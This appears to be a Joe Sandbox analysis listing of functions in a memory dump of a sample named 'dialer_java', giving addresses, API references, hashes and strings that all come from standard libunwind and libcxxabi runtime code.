Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memset$fputc
String ID: 0
API String ID: 2903701566-4108050209
Opcode ID: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction ID: 8be75e39e00ef4bbdb06f76519996d1a349adce6a3f5a63bb52c259a3448879c
Opcode Fuzzy Hash: a0d3a5661ce36724ce4f0edf4d6f76673b84bc3000fc61610cd582833da42273
Instruction Fuzzy Hash: 0941C493F082C246F7754E2D914A3795ED1AB20744F045130CE6AF66C1DE3EE8818306

Function 00007FF6E3A686C0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A686ED
fflush.MSVCRT ref: 00007FF6E3A68739

Strings

libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx), xrefs: 00007FF6E3A68719
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A686E6

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_set_reg(cursor=%p, regNum=%d, value=0x%llx)
API String ID: 1137233558-2498214732
Opcode ID: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction ID: 4aaf0922d0ee44f170ec3dfa2f7cfe668fb512d38bbdf9887e34aa4fec876637
Opcode Fuzzy Hash: 2626be18dc42d8a8097e90423a9df2a82f05378c710c0b61fbde6bc6877379b2
Instruction Fuzzy Hash: 6A31A527B1964541EB109B1EE8463793B58ABAAFD4F140136CE8E637A0CE3ED486C305

Function 00007FF6E3A629A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

CCG , xrefs: 00007FF6E3A629B7

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID:
String ID: CCG
API String ID: 0-1584390748
Opcode ID: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction ID: 67c7e7252017719a681edbc30ee291e76494581651f6fa41d6cf6fbf0242e208
Opcode Fuzzy Hash: bca2953d2b6e64a94037ce9de8f585ddac2b29dba40fb9bb50120e72cae4939b
Instruction Fuzzy Hash: BE210623F1E14242FA74461C99973B93983AFA5B60F148571CD4EE73C9CDAFA8C1924B

Function 00007FF6E3A7149D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 70COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00007FF6E3A716CB

Part of subcall function 00007FF6E3A70A70: strlen.MSVCRT ref: 00007FF6E3A70B79

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: mallocstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 770973918-3503049562
Opcode ID: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction ID: e88a03b064371361e64b89dfb074961bee4efdc60e0596c49bb4c695dd1dc628
Opcode Fuzzy Hash: 7ad9bc6fb11ea0c1023f7e788617ed7f8260cd34674b678aa8a858bf99d7ee5a
Instruction Fuzzy Hash: AF31D133B2978186EA15CB18D4453A83BA8EB45B45F054235DE5C9B3E1EE3DE6C68305

Function 00007FF6E3A71215 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6E3A70B79
malloc.MSVCRT ref: 00007FF6E3A71251
_assert.MSVCRT ref: 00007FF6E3A71E69
malloc.MSVCRT ref: 00007FF6E3A71EB6

Strings

starts_with(Res, "operator") && "operator name does not start with 'operator'", xrefs: 00007FF6E3A71E55
/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h, xrefs: 00007FF6E3A71E5C

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: malloc$_assertstrlen
String ID: /home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/demangle/ItaniumDemangle.h$starts_with(Res, "operator") && "operator name does not start with 'operator'"
API String ID: 3012236610-3503049562
Opcode ID: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction ID: 080640b5df560535bb1d6245d99760d8dbf303a1741d4a7bf8baeba767b41607
Opcode Fuzzy Hash: 80f2192df68dbc29744cb51aa87aac9d3ce2de7a8ecce5c615236e9c91d40759
Instruction Fuzzy Hash: D521F33331578189EB55CB1CE4497A93BA8EB05B80F440236EE5C9B7A1DE3DE586C319

Function 00007FF6E3A7C460 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7C498
realloc.MSVCRT ref: 00007FF6E3A7C4FF

Strings

_if:, xrefs: 00007FF6E3A7C4B7
[enable, xrefs: 00007FF6E3A7C4A9

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: realloc
String ID: [enable$_if:
API String ID: 471065373-3342140569
Opcode ID: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction ID: e86d9378ed1dd36926dc6857ffd77f6d3a0413dcba4eb950e341d58004d9b350
Opcode Fuzzy Hash: 32ce757cdf94413e0a34cfbba9be9b52abb9da3bc6a676b3070354fd22958f46
Instruction Fuzzy Hash: 47114CF3B06B8682DA189F0AF85536DA765EB54BC0F50C531CB4E577A5EE3DE4818304

Function 00007FF6E3A68600 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A6862C
fflush.MSVCRT ref: 00007FF6E3A68678

Strings

libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p), xrefs: 00007FF6E3A68658
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A68625

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_reg(cursor=%p, regNum=%d, &value=%p)
API String ID: 1137233558-3294674404
Opcode ID: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction ID: 5c571603b72e18a9a296df376b4cff9f48bc516c01dba1ad1f4264c531b9fae7
Opcode Fuzzy Hash: 9cb7dbdd395e0dc0e117b359f92bc1a8fce241447a1837db2b0fbb34ec30046f
Instruction Fuzzy Hash: 2A11E627F1964641F7148B2EE8563783E98AFA6B84F040035CD4DE33A1DE3E9886C30A

Function 00007FF6E3A770F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A77133
memcpy.MSVCRT ref: 00007FF6E3A7715E

Strings

true, xrefs: 00007FF6E3A7714D
false, xrefs: 00007FF6E3A77146

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: memcpyrealloc
String ID: false$true
API String ID: 2500458235-2658103896
Opcode ID: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction ID: 3384f904c1888d6774cb34d4cee90b93cdcd6abd650d870a3b33c998015895be
Opcode Fuzzy Hash: 1e1fe210c3eab68983c4b7e7364e77fabcd6bcea1fa908b9b662bbad9f5be460
Instruction Fuzzy Hash: AB01D8E3F05A8642EB189B19E9953BD6B51AF447C0F448431CA5C57696EE2DD4C18305

Function 00007FF6E3A689B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A689E2
fflush.MSVCRT ref: 00007FF6E3A68A2D

Strings

LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A689DB
libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu), xrefs: 00007FF6E3A68A0D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_name(cursor=%p, &buf=%p, bufLen=%lu)
API String ID: 1137233558-3584756005
Opcode ID: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction ID: daa436bb74ccb0abf79e80714ef3fc82c6cb9f2d77b27bb2232f6caf13aafee6
Opcode Fuzzy Hash: ddb072e9844bd1fc43088026deb61ec753b8945efa0d84c694245139cab19971
Instruction Fuzzy Hash: 2F11C213B1968642FB008B2AAC063B53F846F66BD4F04013ADC4EB73A1DD3E9582830A

Function 00007FF6E3A64D00 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6E3A68C00: InitOnceExecuteOnce.KERNEL32(?,?,?,?,00007FF6E3A64D18,?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609), ref: 00007FF6E3A68C11

FlsGetValue.KERNEL32(?,?,?,00007FF6E3A62E71,?,?,00007FF6E3B8CC48,00000000,00007FF6E3A61609,?,?,?,?,00007FF6E3A61315), ref: 00007FF6E3A64D22

Part of subcall function 00007FF6E3A680D0: calloc.MSVCRT ref: 00007FF6E3A680DD
Part of subcall function 00007FF6E3A680D0: memset.MSVCRT ref: 00007FF6E3A68106

Part of subcall function 00007FF6E3A68C90: FlsSetValue.KERNEL32(?,?,?,?,00007FF6E3A64E16), ref: 00007FF6E3A68C94

Strings

execute once failure in __cxa_get_globals_fast(), xrefs: 00007FF6E3A64D61
cannot allocate __cxa_eh_globals, xrefs: 00007FF6E3A64D6D
std::__libcpp_tls_set failure in __cxa_get_globals(), xrefs: 00007FF6E3A64D79

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: OnceValue$ExecuteInitcallocmemset
String ID: cannot allocate __cxa_eh_globals$execute once failure in __cxa_get_globals_fast()$std::__libcpp_tls_set failure in __cxa_get_globals()
API String ID: 2044551959-1509371760
Opcode ID: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction ID: b18a2819d8dd214c79bd0270eecbb3ce3569fd339beeea06a789876b6e904ba3
Opcode Fuzzy Hash: f1f45e0f00f5ce3d31606f51eb7ee3d72e9977eaa92f880a2da06ea4c8e6213e
Instruction Fuzzy Hash: 46014F22F3960781FB54A71DA8573B43A845F90380F410939D90DE62E3FE2FB8D1830A

Function 00007FF6E3A68880 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A688A8
fflush.MSVCRT ref: 00007FF6E3A688ED

Strings

libunwind: __unw_get_proc_info(cursor=%p, &info=%p), xrefs: 00007FF6E3A688CE
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A688A1

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: fflushgetenv
String ID: LIBUNWIND_PRINT_APIS$libunwind: __unw_get_proc_info(cursor=%p, &info=%p)
API String ID: 1137233558-1935908800
Opcode ID: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction ID: 608e09e3c667565117b079cb3459624a48ce04dfae6f725b34f49007963ede02
Opcode Fuzzy Hash: e8ba0983abbb9daa666b015af6d5d3ea47504ba357e157cfbd2d07a602640b6c
Instruction Fuzzy Hash: DE018412F2969241FB14571EE9073753E989F56BD0F04403AC94EB73E1DE2EA5C2830A

Function 00007FF6E3A618B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41COMMON

Download Yara Rule

APIs

abort.MSVCRT(00000000,00000000,00000000,?,00007FF6E3A61C09), ref: 00007FF6E3A619EF
_assert.MSVCRT ref: 00007FF6E3A61A08

Strings

/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp, xrefs: 00007FF6E3A619FB
(base != 0) && "DW_EH_PE_datarel is invalid with a base of 0", xrefs: 00007FF6E3A619F4

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertabort
String ID: (base != 0) && "DW_EH_PE_datarel is invalid with a base of 0"$/home/runner/work/llvm-mingw/llvm-mingw/llvm-project/libcxxabi/src/cxa_personality.cpp
API String ID: 1072228434-1306384422
Opcode ID: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction ID: cd983471cd4d6050d9183415dc4265db081cc9f6af8c146605451321650d695f
Opcode Fuzzy Hash: 55f8dda17198795800073456670580f640aef58b898c353accad96664cddbd08
Instruction Fuzzy Hash: A9011223F29A5640FEB6875CE5477782E845F54390F490836CE1EF2281EE3FA8C5820A

Function 00007FF6E3A7B380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7B3E6
memcpy.MSVCRT ref: 00007FF6E3A7B400
_assert.MSVCRT ref: 00007FF6E3A7B42A

Strings

basic_istream, xrefs: 00007FF6E3A7B385
basi, xrefs: 00007FF6E3A7B39A

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_istream
API String ID: 2326172077-1189760207
Opcode ID: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction ID: 6fd06faa17f09e1ccfcf9d8f6a9ca4a1b145a04f24faac3c36c7abdf0bbafed2
Opcode Fuzzy Hash: f31d0bfda383c1b6082b963be46f988af25024c433917d3f22b798f058380b77
Instruction Fuzzy Hash: CA01DFE3F0664283EA688B0AF681779AB91EB247C4F408030CA5D97A85EF2DE5C08305

Function 00007FF6E3A7B38E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

realloc.MSVCRT ref: 00007FF6E3A7B3E6
memcpy.MSVCRT ref: 00007FF6E3A7B400
_assert.MSVCRT ref: 00007FF6E3A7B42A

Strings

basic_iostream, xrefs: 00007FF6E3A7B393
basi, xrefs: 00007FF6E3A7B39A

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914647466.00007FF6E3B8F000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914673975.00007FF6E3B93000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff6e3a60000_dialer_java.jbxd

Similarity

API ID: _assertmemcpyrealloc
String ID: basi$basic_iostream
API String ID: 2326172077-3201662033
Opcode ID: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction ID: 8d0a32609a110e324a5e0aefa4ad7ca6fb757bb8d1c1b4f26a9f14636e7df356
Opcode Fuzzy Hash: 1823fbeb78b408ddb3383061037edbd1725e6bbaf58f914d64ac0c32d595fd86
Instruction Fuzzy Hash: 20F0A2F3B0275283EA648B09F685769AB91EB647C4F448030CB5D57B85EF2DD5D08305

Function 00007FF6E3A68920 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35COMMON

Download Yara Rule

APIs

getenv.MSVCRT ref: 00007FF6E3A68944
fflush.MSVCRT ref: 00007FF6E3A68986

Strings

libunwind: __unw_resume(cursor=%p), xrefs: 00007FF6E3A6896A
LIBUNWIND_PRINT_APIS, xrefs: 00007FF6E3A6893D

Memory Dump Source

Source File: 00000010.00000002.1914431606.00007FF6E3A61000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E3A60000, based on PE: true

Associated: 00000010.00000002.1914404633.00007FF6E3A60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914465385.00007FF6E3A89000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914493213.00007FF6E3A93000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914517226.00007FF6E3A94000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000010.00000002.1914622587.00007FF6E3B8C000.00000004.00000001.01000000.00000004.sdmpDownload File
